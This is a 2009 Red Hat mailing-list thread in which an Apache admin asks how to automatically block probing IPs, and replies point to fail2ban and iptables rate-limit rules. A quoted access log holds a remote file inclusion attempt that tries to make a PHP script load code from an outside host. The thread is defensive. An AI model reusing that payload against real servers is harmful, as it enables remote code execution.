blocking ips with iptables accessing invalid URL

ESGLinux esggrupos at gmail.com
Wed Jul 8 10:31:05 UTC 2009 

2009/7/8 Manuel Aróstegui <manuel at todo-linux.com>

> El mié, 08-07-2009 a las 09:58 +0200, ESGLinux escribió:
> > Hi all,
> > I´m having a problem with an Apache web server.
> >
> > I get a lot of access ot this kind:
> >
> >
> > x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET
> > //includes/mailaccess/pop3.php?CONFIG[pear_dir]=
> http://aboutav.com//id1.txt???
> > HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
> >
> > where x.x.x.x is the ip of the client, I suposse this ip is trying to
> find a
> > security hole in my system, so what I do manually is this:
> >
> > iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP
> >
> > I want to do this automatically. I´m thinking to use logwatch but I´m not
> > sure how to do it. (I´m testing but for the moment I haven´t found the
> > solution)
>
> You might want to test fail2ban:
> http://www.fail2ban.org/wiki/index.php/Main_Page


Hey, I think this software does exactly what I want. I´m going to give it a
try.



> <http://www.fail2ban.org/wiki/index.php/Main_Page>
>
>
> >
> > By the way, I´m interesting to limit the connections to my webserver
> using
> > iptables with limit module and busrt argument. What do you think about
> it?
> > is a good solution or I´m on the wrong way? Do you know how to prevent
> DOS
> > attacks?
>
> The first approach that comes to my mind would be something like:
>
> iptables -N APACHE_CHECK
> iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK
> iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name
> APACHE
> iptables -A APACHE_CHECK -m state --state NEW -m recent --update
> --seconds 60 --hitcount 4 --name APACHE
> iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck
> --seconds 60 --hitcount 4 --name APACHE -j DROP
>
> This will prevent you from small DoS attempts from the same IP within 1
> minute.


I like this kind of solution but I think this rules doesnt work. with them
the webserver does not respond to a single petition.

I have loaded this in my test computer:

iptables -N APACHE_CHECK
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK
iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name APACHE

iptables -A APACHE_CHECK -m state --state NEW -m recent --update --seconds
60 --hitcount 4 --name APACHE

iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds
60 --hitcount 4 --name APACHE -j LOG

iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds
60 --hitcount 4 --name APACHE -j DROP

I have added the rule to log when the packets are dropped and it logs every
packet, what is wrong?


Thanks for your asnwer

ESG



>
>
> Manuel.
> --
> Manuel Arostegui Ramirez.
>
> Electronic Mail is not secure, might not be read every day, and should not
> be used for urgent or sensitive issues.
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
>

More information about the redhat-list mailing list